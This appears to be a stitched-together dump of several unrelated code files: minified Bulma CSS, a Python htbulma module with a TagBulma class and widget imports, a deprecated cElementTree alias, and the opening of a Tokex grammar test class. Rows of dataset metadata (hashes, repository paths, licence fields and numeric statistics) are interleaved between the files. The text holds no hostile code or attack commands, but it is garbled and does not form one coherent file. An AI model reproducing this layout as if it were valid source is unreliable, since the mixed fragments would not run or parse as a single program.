(min-width:1216px) and (max-width:1407px){.columns.is-variable.is-1-widescreen-only{--columnGap:0.25rem}}@media screen and 
(min-width:1408px){.columns.is-variable.is-1-fullhd{--columnGap:0.25rem}}.columns.is-variable.is-2{--columnGap:0.5rem}@media screen and (max-width:768px){.columns.is-variable.is-2-mobile{--columnGap:0.5rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-2-tablet{--columnGap:0.5rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-2-tablet-only{--columnGap:0.5rem}}@media screen and (max-width:1023px){.columns.is-variable.is-2-touch{--columnGap:0.5rem}}@media screen and (min-width:1024px){.columns.is-variable.is-2-desktop{--columnGap:0.5rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-2-desktop-only{--columnGap:0.5rem}}@media screen and (min-width:1216px){.columns.is-variable.is-2-widescreen{--columnGap:0.5rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-2-widescreen-only{--columnGap:0.5rem}}@media screen and (min-width:1408px){.columns.is-variable.is-2-fullhd{--columnGap:0.5rem}}.columns.is-variable.is-3{--columnGap:0.75rem}@media screen and (max-width:768px){.columns.is-variable.is-3-mobile{--columnGap:0.75rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-3-tablet{--columnGap:0.75rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-3-tablet-only{--columnGap:0.75rem}}@media screen and (max-width:1023px){.columns.is-variable.is-3-touch{--columnGap:0.75rem}}@media screen and (min-width:1024px){.columns.is-variable.is-3-desktop{--columnGap:0.75rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-3-desktop-only{--columnGap:0.75rem}}@media screen and (min-width:1216px){.columns.is-variable.is-3-widescreen{--columnGap:0.75rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-3-widescreen-only{--columnGap:0.75rem}}@media screen and 
(min-width:1408px){.columns.is-variable.is-3-fullhd{--columnGap:0.75rem}}.columns.is-variable.is-4{--columnGap:1rem}@media screen and (max-width:768px){.columns.is-variable.is-4-mobile{--columnGap:1rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-4-tablet{--columnGap:1rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-4-tablet-only{--columnGap:1rem}}@media screen and (max-width:1023px){.columns.is-variable.is-4-touch{--columnGap:1rem}}@media screen and (min-width:1024px){.columns.is-variable.is-4-desktop{--columnGap:1rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-4-desktop-only{--columnGap:1rem}}@media screen and (min-width:1216px){.columns.is-variable.is-4-widescreen{--columnGap:1rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-4-widescreen-only{--columnGap:1rem}}@media screen and (min-width:1408px){.columns.is-variable.is-4-fullhd{--columnGap:1rem}}.columns.is-variable.is-5{--columnGap:1.25rem}@media screen and (max-width:768px){.columns.is-variable.is-5-mobile{--columnGap:1.25rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-5-tablet{--columnGap:1.25rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-5-tablet-only{--columnGap:1.25rem}}@media screen and (max-width:1023px){.columns.is-variable.is-5-touch{--columnGap:1.25rem}}@media screen and (min-width:1024px){.columns.is-variable.is-5-desktop{--columnGap:1.25rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-5-desktop-only{--columnGap:1.25rem}}@media screen and (min-width:1216px){.columns.is-variable.is-5-widescreen{--columnGap:1.25rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-5-widescreen-only{--columnGap:1.25rem}}@media screen and 
(min-width:1408px){.columns.is-variable.is-5-fullhd{--columnGap:1.25rem}}.columns.is-variable.is-6{--columnGap:1.5rem}@media screen and (max-width:768px){.columns.is-variable.is-6-mobile{--columnGap:1.5rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-6-tablet{--columnGap:1.5rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-6-tablet-only{--columnGap:1.5rem}}@media screen and (max-width:1023px){.columns.is-variable.is-6-touch{--columnGap:1.5rem}}@media screen and (min-width:1024px){.columns.is-variable.is-6-desktop{--columnGap:1.5rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-6-desktop-only{--columnGap:1.5rem}}@media screen and (min-width:1216px){.columns.is-variable.is-6-widescreen{--columnGap:1.5rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-6-widescreen-only{--columnGap:1.5rem}}@media screen and (min-width:1408px){.columns.is-variable.is-6-fullhd{--columnGap:1.5rem}}.columns.is-variable.is-7{--columnGap:1.75rem}@media screen and (max-width:768px){.columns.is-variable.is-7-mobile{--columnGap:1.75rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-7-tablet{--columnGap:1.75rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-7-tablet-only{--columnGap:1.75rem}}@media screen and (max-width:1023px){.columns.is-variable.is-7-touch{--columnGap:1.75rem}}@media screen and (min-width:1024px){.columns.is-variable.is-7-desktop{--columnGap:1.75rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-7-desktop-only{--columnGap:1.75rem}}@media screen and (min-width:1216px){.columns.is-variable.is-7-widescreen{--columnGap:1.75rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-7-widescreen-only{--columnGap:1.75rem}}@media screen and 
(min-width:1408px){.columns.is-variable.is-7-fullhd{--columnGap:1.75rem}}.columns.is-variable.is-8{--columnGap:2rem}@media screen and (max-width:768px){.columns.is-variable.is-8-mobile{--columnGap:2rem}}@media screen and (min-width:769px),print{.columns.is-variable.is-8-tablet{--columnGap:2rem}}@media screen and (min-width:769px) and (max-width:1023px){.columns.is-variable.is-8-tablet-only{--columnGap:2rem}}@media screen and (max-width:1023px){.columns.is-variable.is-8-touch{--columnGap:2rem}}@media screen and (min-width:1024px){.columns.is-variable.is-8-desktop{--columnGap:2rem}}@media screen and (min-width:1024px) and (max-width:1215px){.columns.is-variable.is-8-desktop-only{--columnGap:2rem}}@media screen and (min-width:1216px){.columns.is-variable.is-8-widescreen{--columnGap:2rem}}@media screen and (min-width:1216px) and (max-width:1407px){.columns.is-variable.is-8-widescreen-only{--columnGap:2rem}}@media screen and (min-width:1408px){.columns.is-variable.is-8-fullhd{--columnGap:2rem}}.tile{align-items:stretch;display:block;flex-basis:0;flex-grow:1;flex-shrink:1;min-height:-webkit-min-content;min-height:-moz-min-content;min-height:min-content}.tile.is-ancestor{margin-left:-.75rem;margin-right:-.75rem;margin-top:-.75rem}.tile.is-ancestor:last-child{margin-bottom:-.75rem}.tile.is-ancestor:not(:last-child){margin-bottom:.75rem}.tile.is-child{margin:0!important}.tile.is-parent{padding:.75rem}.tile.is-vertical{flex-direction:column}.tile.is-vertical>.tile.is-child:not(:last-child){margin-bottom:1.5rem!important}@media screen and 
(min-width:769px),print{.tile:not(.is-child){display:flex}.tile.is-1{flex:none;width:8.33333%}.tile.is-2{flex:none;width:16.66667%}.tile.is-3{flex:none;width:25%}.tile.is-4{flex:none;width:33.33333%}.tile.is-5{flex:none;width:41.66667%}.tile.is-6{flex:none;width:50%}.tile.is-7{flex:none;width:58.33333%}.tile.is-8{flex:none;width:66.66667%}.tile.is-9{flex:none;width:75%}.tile.is-10{flex:none;width:83.33333%}.tile.is-11{flex:none;width:91.66667%}.tile.is-12{flex:none;width:100%}}.hero{align-items:stretch;display:flex;flex-direction:column;justify-content:space-between}.hero .navbar{background:0 0}.hero .tabs ul{border-bottom:none}.hero.is-white{background-color:#fff;color:#0a0a0a}.hero.is-white a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-white strong{color:inherit}.hero.is-white .title{color:#0a0a0a}.hero.is-white .subtitle{color:rgba(10,10,10,.9)}.hero.is-white .subtitle a:not(.button),.hero.is-white .subtitle strong{color:#0a0a0a}@media screen and (max-width:1023px){.hero.is-white .navbar-menu{background-color:#fff}}.hero.is-white .navbar-item,.hero.is-white .navbar-link{color:rgba(10,10,10,.7)}.hero.is-white .navbar-link.is-active,.hero.is-white .navbar-link:hover,.hero.is-white a.navbar-item.is-active,.hero.is-white a.navbar-item:hover{background-color:#f2f2f2;color:#0a0a0a}.hero.is-white .tabs a{color:#0a0a0a;opacity:.9}.hero.is-white .tabs a:hover{opacity:1}.hero.is-white .tabs li.is-active a{opacity:1}.hero.is-white .tabs.is-boxed a,.hero.is-white .tabs.is-toggle a{color:#0a0a0a}.hero.is-white .tabs.is-boxed a:hover,.hero.is-white .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-white .tabs.is-boxed li.is-active a,.hero.is-white .tabs.is-boxed li.is-active a:hover,.hero.is-white .tabs.is-toggle li.is-active a,.hero.is-white .tabs.is-toggle li.is-active a:hover{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.hero.is-white.is-bold{background-image:linear-gradient(141deg,#e6e6e6 0,#fff 
71%,#fff 100%)}@media screen and (max-width:768px){.hero.is-white.is-bold .navbar-menu{background-image:linear-gradient(141deg,#e6e6e6 0,#fff 71%,#fff 100%)}}.hero.is-black{background-color:#0a0a0a;color:#fff}.hero.is-black a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-black strong{color:inherit}.hero.is-black .title{color:#fff}.hero.is-black .subtitle{color:rgba(255,255,255,.9)}.hero.is-black .subtitle a:not(.button),.hero.is-black .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-black .navbar-menu{background-color:#0a0a0a}}.hero.is-black .navbar-item,.hero.is-black .navbar-link{color:rgba(255,255,255,.7)}.hero.is-black .navbar-link.is-active,.hero.is-black .navbar-link:hover,.hero.is-black a.navbar-item.is-active,.hero.is-black a.navbar-item:hover{background-color:#000;color:#fff}.hero.is-black .tabs a{color:#fff;opacity:.9}.hero.is-black .tabs a:hover{opacity:1}.hero.is-black .tabs li.is-active a{opacity:1}.hero.is-black .tabs.is-boxed a,.hero.is-black .tabs.is-toggle a{color:#fff}.hero.is-black .tabs.is-boxed a:hover,.hero.is-black .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-black .tabs.is-boxed li.is-active a,.hero.is-black .tabs.is-boxed li.is-active a:hover,.hero.is-black .tabs.is-toggle li.is-active a,.hero.is-black .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#0a0a0a}.hero.is-black.is-bold{background-image:linear-gradient(141deg,#000 0,#0a0a0a 71%,#181616 100%)}@media screen and (max-width:768px){.hero.is-black.is-bold .navbar-menu{background-image:linear-gradient(141deg,#000 0,#0a0a0a 71%,#181616 100%)}}.hero.is-light{background-color:#f5f5f5;color:rgba(0,0,0,.7)}.hero.is-light a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-light strong{color:inherit}.hero.is-light .title{color:rgba(0,0,0,.7)}.hero.is-light .subtitle{color:rgba(0,0,0,.9)}.hero.is-light .subtitle 
a:not(.button),.hero.is-light .subtitle strong{color:rgba(0,0,0,.7)}@media screen and (max-width:1023px){.hero.is-light .navbar-menu{background-color:#f5f5f5}}.hero.is-light .navbar-item,.hero.is-light .navbar-link{color:rgba(0,0,0,.7)}.hero.is-light .navbar-link.is-active,.hero.is-light .navbar-link:hover,.hero.is-light a.navbar-item.is-active,.hero.is-light a.navbar-item:hover{background-color:#e8e8e8;color:rgba(0,0,0,.7)}.hero.is-light .tabs a{color:rgba(0,0,0,.7);opacity:.9}.hero.is-light .tabs a:hover{opacity:1}.hero.is-light .tabs li.is-active a{opacity:1}.hero.is-light .tabs.is-boxed a,.hero.is-light .tabs.is-toggle a{color:rgba(0,0,0,.7)}.hero.is-light .tabs.is-boxed a:hover,.hero.is-light .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-light .tabs.is-boxed li.is-active a,.hero.is-light .tabs.is-boxed li.is-active a:hover,.hero.is-light .tabs.is-toggle li.is-active a,.hero.is-light .tabs.is-toggle li.is-active a:hover{background-color:rgba(0,0,0,.7);border-color:rgba(0,0,0,.7);color:#f5f5f5}.hero.is-light.is-bold{background-image:linear-gradient(141deg,#dfd8d9 0,#f5f5f5 71%,#fff 100%)}@media screen and (max-width:768px){.hero.is-light.is-bold .navbar-menu{background-image:linear-gradient(141deg,#dfd8d9 0,#f5f5f5 71%,#fff 100%)}}.hero.is-dark{background-color:#363636;color:#fff}.hero.is-dark a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-dark strong{color:inherit}.hero.is-dark .title{color:#fff}.hero.is-dark .subtitle{color:rgba(255,255,255,.9)}.hero.is-dark .subtitle a:not(.button),.hero.is-dark .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-dark .navbar-menu{background-color:#363636}}.hero.is-dark .navbar-item,.hero.is-dark .navbar-link{color:rgba(255,255,255,.7)}.hero.is-dark .navbar-link.is-active,.hero.is-dark .navbar-link:hover,.hero.is-dark a.navbar-item.is-active,.hero.is-dark a.navbar-item:hover{background-color:#292929;color:#fff}.hero.is-dark .tabs 
a{color:#fff;opacity:.9}.hero.is-dark .tabs a:hover{opacity:1}.hero.is-dark .tabs li.is-active a{opacity:1}.hero.is-dark .tabs.is-boxed a,.hero.is-dark .tabs.is-toggle a{color:#fff}.hero.is-dark .tabs.is-boxed a:hover,.hero.is-dark .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-dark .tabs.is-boxed li.is-active a,.hero.is-dark .tabs.is-boxed li.is-active a:hover,.hero.is-dark .tabs.is-toggle li.is-active a,.hero.is-dark .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#363636}.hero.is-dark.is-bold{background-image:linear-gradient(141deg,#1f191a 0,#363636 71%,#46403f 100%)}@media screen and (max-width:768px){.hero.is-dark.is-bold .navbar-menu{background-image:linear-gradient(141deg,#1f191a 0,#363636 71%,#46403f 100%)}}.hero.is-primary{background-color:#00d1b2;color:#fff}.hero.is-primary a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-primary strong{color:inherit}.hero.is-primary .title{color:#fff}.hero.is-primary .subtitle{color:rgba(255,255,255,.9)}.hero.is-primary .subtitle a:not(.button),.hero.is-primary .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-primary .navbar-menu{background-color:#00d1b2}}.hero.is-primary .navbar-item,.hero.is-primary .navbar-link{color:rgba(255,255,255,.7)}.hero.is-primary .navbar-link.is-active,.hero.is-primary .navbar-link:hover,.hero.is-primary a.navbar-item.is-active,.hero.is-primary a.navbar-item:hover{background-color:#00b89c;color:#fff}.hero.is-primary .tabs a{color:#fff;opacity:.9}.hero.is-primary .tabs a:hover{opacity:1}.hero.is-primary .tabs li.is-active a{opacity:1}.hero.is-primary .tabs.is-boxed a,.hero.is-primary .tabs.is-toggle a{color:#fff}.hero.is-primary .tabs.is-boxed a:hover,.hero.is-primary .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-primary .tabs.is-boxed li.is-active a,.hero.is-primary .tabs.is-boxed li.is-active a:hover,.hero.is-primary .tabs.is-toggle li.is-active 
a,.hero.is-primary .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#00d1b2}.hero.is-primary.is-bold{background-image:linear-gradient(141deg,#009e6c 0,#00d1b2 71%,#00e7eb 100%)}@media screen and (max-width:768px){.hero.is-primary.is-bold .navbar-menu{background-image:linear-gradient(141deg,#009e6c 0,#00d1b2 71%,#00e7eb 100%)}}.hero.is-link{background-color:#3273dc;color:#fff}.hero.is-link a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-link strong{color:inherit}.hero.is-link .title{color:#fff}.hero.is-link .subtitle{color:rgba(255,255,255,.9)}.hero.is-link .subtitle a:not(.button),.hero.is-link .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-link .navbar-menu{background-color:#3273dc}}.hero.is-link .navbar-item,.hero.is-link .navbar-link{color:rgba(255,255,255,.7)}.hero.is-link .navbar-link.is-active,.hero.is-link .navbar-link:hover,.hero.is-link a.navbar-item.is-active,.hero.is-link a.navbar-item:hover{background-color:#2366d1;color:#fff}.hero.is-link .tabs a{color:#fff;opacity:.9}.hero.is-link .tabs a:hover{opacity:1}.hero.is-link .tabs li.is-active a{opacity:1}.hero.is-link .tabs.is-boxed a,.hero.is-link .tabs.is-toggle a{color:#fff}.hero.is-link .tabs.is-boxed a:hover,.hero.is-link .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-link .tabs.is-boxed li.is-active a,.hero.is-link .tabs.is-boxed li.is-active a:hover,.hero.is-link .tabs.is-toggle li.is-active a,.hero.is-link .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#3273dc}.hero.is-link.is-bold{background-image:linear-gradient(141deg,#1577c6 0,#3273dc 71%,#4366e5 100%)}@media screen and (max-width:768px){.hero.is-link.is-bold .navbar-menu{background-image:linear-gradient(141deg,#1577c6 0,#3273dc 71%,#4366e5 100%)}}.hero.is-info{background-color:#3298dc;color:#fff}.hero.is-info 
a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-info strong{color:inherit}.hero.is-info .title{color:#fff}.hero.is-info .subtitle{color:rgba(255,255,255,.9)}.hero.is-info .subtitle a:not(.button),.hero.is-info .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-info .navbar-menu{background-color:#3298dc}}.hero.is-info .navbar-item,.hero.is-info .navbar-link{color:rgba(255,255,255,.7)}.hero.is-info .navbar-link.is-active,.hero.is-info .navbar-link:hover,.hero.is-info a.navbar-item.is-active,.hero.is-info a.navbar-item:hover{background-color:#238cd1;color:#fff}.hero.is-info .tabs a{color:#fff;opacity:.9}.hero.is-info .tabs a:hover{opacity:1}.hero.is-info .tabs li.is-active a{opacity:1}.hero.is-info .tabs.is-boxed a,.hero.is-info .tabs.is-toggle a{color:#fff}.hero.is-info .tabs.is-boxed a:hover,.hero.is-info .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-info .tabs.is-boxed li.is-active a,.hero.is-info .tabs.is-boxed li.is-active a:hover,.hero.is-info .tabs.is-toggle li.is-active a,.hero.is-info .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#3298dc}.hero.is-info.is-bold{background-image:linear-gradient(141deg,#159dc6 0,#3298dc 71%,#4389e5 100%)}@media screen and (max-width:768px){.hero.is-info.is-bold .navbar-menu{background-image:linear-gradient(141deg,#159dc6 0,#3298dc 71%,#4389e5 100%)}}.hero.is-success{background-color:#48c774;color:#fff}.hero.is-success a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-success strong{color:inherit}.hero.is-success .title{color:#fff}.hero.is-success .subtitle{color:rgba(255,255,255,.9)}.hero.is-success .subtitle a:not(.button),.hero.is-success .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-success .navbar-menu{background-color:#48c774}}.hero.is-success .navbar-item,.hero.is-success .navbar-link{color:rgba(255,255,255,.7)}.hero.is-success 
.navbar-link.is-active,.hero.is-success .navbar-link:hover,.hero.is-success a.navbar-item.is-active,.hero.is-success a.navbar-item:hover{background-color:#3abb67;color:#fff}.hero.is-success .tabs a{color:#fff;opacity:.9}.hero.is-success .tabs a:hover{opacity:1}.hero.is-success .tabs li.is-active a{opacity:1}.hero.is-success .tabs.is-boxed a,.hero.is-success .tabs.is-toggle a{color:#fff}.hero.is-success .tabs.is-boxed a:hover,.hero.is-success .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-success .tabs.is-boxed li.is-active a,.hero.is-success .tabs.is-boxed li.is-active a:hover,.hero.is-success .tabs.is-toggle li.is-active a,.hero.is-success .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#48c774}.hero.is-success.is-bold{background-image:linear-gradient(141deg,#29b342 0,#48c774 71%,#56d296 100%)}@media screen and (max-width:768px){.hero.is-success.is-bold .navbar-menu{background-image:linear-gradient(141deg,#29b342 0,#48c774 71%,#56d296 100%)}}.hero.is-warning{background-color:#ffdd57;color:rgba(0,0,0,.7)}.hero.is-warning a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-warning strong{color:inherit}.hero.is-warning .title{color:rgba(0,0,0,.7)}.hero.is-warning .subtitle{color:rgba(0,0,0,.9)}.hero.is-warning .subtitle a:not(.button),.hero.is-warning .subtitle strong{color:rgba(0,0,0,.7)}@media screen and (max-width:1023px){.hero.is-warning .navbar-menu{background-color:#ffdd57}}.hero.is-warning .navbar-item,.hero.is-warning .navbar-link{color:rgba(0,0,0,.7)}.hero.is-warning .navbar-link.is-active,.hero.is-warning .navbar-link:hover,.hero.is-warning a.navbar-item.is-active,.hero.is-warning a.navbar-item:hover{background-color:#ffd83d;color:rgba(0,0,0,.7)}.hero.is-warning .tabs a{color:rgba(0,0,0,.7);opacity:.9}.hero.is-warning .tabs a:hover{opacity:1}.hero.is-warning .tabs li.is-active a{opacity:1}.hero.is-warning .tabs.is-boxed a,.hero.is-warning .tabs.is-toggle 
a{color:rgba(0,0,0,.7)}.hero.is-warning .tabs.is-boxed a:hover,.hero.is-warning .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-warning .tabs.is-boxed li.is-active a,.hero.is-warning .tabs.is-boxed li.is-active a:hover,.hero.is-warning .tabs.is-toggle li.is-active a,.hero.is-warning .tabs.is-toggle li.is-active a:hover{background-color:rgba(0,0,0,.7);border-color:rgba(0,0,0,.7);color:#ffdd57}.hero.is-warning.is-bold{background-image:linear-gradient(141deg,#ffaf24 0,#ffdd57 71%,#fffa70 100%)}@media screen and (max-width:768px){.hero.is-warning.is-bold .navbar-menu{background-image:linear-gradient(141deg,#ffaf24 0,#ffdd57 71%,#fffa70 100%)}}.hero.is-danger{background-color:#f14668;color:#fff}.hero.is-danger a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-danger strong{color:inherit}.hero.is-danger .title{color:#fff}.hero.is-danger .subtitle{color:rgba(255,255,255,.9)}.hero.is-danger .subtitle a:not(.button),.hero.is-danger .subtitle strong{color:#fff}@media screen and (max-width:1023px){.hero.is-danger .navbar-menu{background-color:#f14668}}.hero.is-danger .navbar-item,.hero.is-danger .navbar-link{color:rgba(255,255,255,.7)}.hero.is-danger .navbar-link.is-active,.hero.is-danger .navbar-link:hover,.hero.is-danger a.navbar-item.is-active,.hero.is-danger a.navbar-item:hover{background-color:#ef2e55;color:#fff}.hero.is-danger .tabs a{color:#fff;opacity:.9}.hero.is-danger .tabs a:hover{opacity:1}.hero.is-danger .tabs li.is-active a{opacity:1}.hero.is-danger .tabs.is-boxed a,.hero.is-danger .tabs.is-toggle a{color:#fff}.hero.is-danger .tabs.is-boxed a:hover,.hero.is-danger .tabs.is-toggle a:hover{background-color:rgba(10,10,10,.1)}.hero.is-danger .tabs.is-boxed li.is-active a,.hero.is-danger .tabs.is-boxed li.is-active a:hover,.hero.is-danger .tabs.is-toggle li.is-active a,.hero.is-danger .tabs.is-toggle li.is-active 
a:hover{background-color:#fff;border-color:#fff;color:#f14668}.hero.is-danger.is-bold{background-image:linear-gradient(141deg,#fa0a62 0,#f14668 71%,#f7595f 100%)}@media screen and (max-width:768px){.hero.is-danger.is-bold .navbar-menu{background-image:linear-gradient(141deg,#fa0a62 0,#f14668 71%,#f7595f 100%)}}.hero.is-small .hero-body{padding:1.5rem}@media screen and (min-width:769px),print{.hero.is-medium .hero-body{padding:9rem 1.5rem}}@media screen and (min-width:769px),print{.hero.is-large .hero-body{padding:18rem 1.5rem}}.hero.is-fullheight .hero-body,.hero.is-fullheight-with-navbar .hero-body,.hero.is-halfheight .hero-body{align-items:center;display:flex}.hero.is-fullheight .hero-body>.container,.hero.is-fullheight-with-navbar .hero-body>.container,.hero.is-halfheight .hero-body>.container{flex-grow:1;flex-shrink:1}.hero.is-halfheight{min-height:50vh}.hero.is-fullheight{min-height:100vh}.hero-video{overflow:hidden}.hero-video video{left:50%;min-height:100%;min-width:100%;position:absolute;top:50%;transform:translate3d(-50%,-50%,0)}.hero-video.is-transparent{opacity:.3}@media screen and (max-width:768px){.hero-video{display:none}}.hero-buttons{margin-top:1.5rem}@media screen and (max-width:768px){.hero-buttons .button{display:flex}.hero-buttons .button:not(:last-child){margin-bottom:.75rem}}@media screen and (min-width:769px),print{.hero-buttons{display:flex;justify-content:center}.hero-buttons .button:not(:last-child){margin-right:1.5rem}}.hero-foot,.hero-head{flex-grow:0;flex-shrink:0}.hero-body{flex-grow:1;flex-shrink:0;padding:3rem 1.5rem}.section{padding:3rem 1.5rem}@media screen and (min-width:1024px){.section.is-medium{padding:9rem 1.5rem}.section.is-large{padding:18rem 1.5rem}}.footer{background-color:#fafafa;padding:3rem 1.5rem 6rem}""")
class TagBulma(Tag):
statics = [Tag.H.meta(_name="version",_content=f"htbulma {__version__}"),css]
def classEnsure(self, klass):
""" helper to ensure the 'klass' is set in @class """
if not self["class"]:
self["class"] = klass
else:
#TODO: not terrible, could do better here ;-)
for i in klass.strip().split(" "):
if i not in self["class"]:
self["class"] += " "+i
def _test(*o):
from htag.runners import PyWebWiew,BrowserHTTP
class _BodyTest(Tag.body):
tag="body"
statics=[Tag.H.style("html,body {width:100%;height:100%}")]
def init(self):
self["style"]="border:1px dotted red"
self <= o
BrowserHTTP( _BodyTest ).run()
########################################
from .bases import Content, Button, A, Progress
from .containers import Box,VBox,HBox, Section
from .fields import Fields
from .form import Form
from .inputs import Input,Range,Checkbox,Radio,SelectButtons,TabsHeader,Select,Textarea
from .splitters import HSplit,VSplit
from .services import MBox,Toaster,PopMenu,Clipboard
from .nav import Nav
from .table import Table
from .tabs import Tabs
from .tags import Tags
from .fileselect import FileSelect
from .fileupload import FileUpload
########################################
ALL = Content, Button, A, Progress, Box,VBox,HBox, Section, Fields, Form, Input,Range,Checkbox,Radio,SelectButtons,TabsHeader,Select,Textarea, HSplit,VSplit, MBox,Toaster,PopMenu,Clipboard, Nav, Table, Tabs, Tags, FileSelect, FileUpload
| 3,174.483871
| 194,776
| 0.782449
| 32,527
| 196,818
| 4.734067
| 0.023058
| 0.048122
| 0.022911
| 0.019651
| 0.770556
| 0.684865
| 0.601409
| 0.505225
| 0.388966
| 0.266565
| 0
| 0.052856
| 0.019795
| 196,818
| 61
| 194,777
| 3,226.52459
| 0.745317
| 0.001621
| 0
| 0
| 0
| 0.028571
| 0.992978
| 0.904187
| 0
| 0
| 0
| 0.016393
| 0
| 1
| 0.085714
| false
| 0
| 0.457143
| 0
| 0.685714
| 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
21b6f158c7f38371e55cbc75849371c9f6745c80
| 85
|
py
|
Python
|
runtime/python/Lib/xml/etree/cElementTree.py
|
hwaipy/InteractionFreeNode
|
88642b68430f57b028fd0f276a5709f89279e30d
|
[
"MIT"
] | 207
|
2018-10-01T08:53:01.000Z
|
2022-03-14T12:15:54.000Z
|
lib/assets/Lib/xml/etree/cElementTree.py
|
it56660024/cafe-grader-web
|
e9a1305fd62e79e54f6961f97ddc5cd57bafd73c
|
[
"MIT"
] | 30
|
2019-01-04T10:14:56.000Z
|
2020-10-12T14:00:31.000Z
|
lib/assets/Lib/xml/etree/cElementTree.py
|
it56660024/cafe-grader-web
|
e9a1305fd62e79e54f6961f97ddc5cd57bafd73c
|
[
"MIT"
] | 76
|
2020-03-16T01:47:46.000Z
|
2022-03-21T16:37:07.000Z
|
# Deprecated alias for xml.etree.ElementTree
from xml.etree.ElementTree import *
| 21.25
| 45
| 0.776471
| 11
| 85
| 6
| 0.727273
| 0.242424
| 0.575758
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152941
| 85
| 3
| 46
| 28.333333
| 0.916667
| 0.494118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
21bc8bb707236e73eb0913dedf03d835f5fbb38a
| 36,870
|
py
|
Python
|
test/test_errors.py
|
warrenspe/tokex
|
2d05dee1c4fe02b55be6c91013db71078396255c
|
[
"MIT"
] | 1
|
2020-11-10T13:43:35.000Z
|
2020-11-10T13:43:35.000Z
|
test/test_errors.py
|
warrenspe/SParse
|
2d05dee1c4fe02b55be6c91013db71078396255c
|
[
"MIT"
] | 11
|
2020-09-10T03:37:24.000Z
|
2020-09-19T04:57:13.000Z
|
test/test_errors.py
|
warrenspe/SParse
|
2d05dee1c4fe02b55be6c91013db71078396255c
|
[
"MIT"
] | null | null | null |
import re
import textwrap
import _test_case
from tokex.grammar.parse import tokenize_grammar, construct_grammar
from tokex.grammar import elements
from tokex.grammar import flags
from tokex import errors
from tokex import functions
class TestErrors(_test_case.TokexTestCase):
""" Class which tests the construction of a Tokex grammar from a grammar string """
maxDiff = 1500
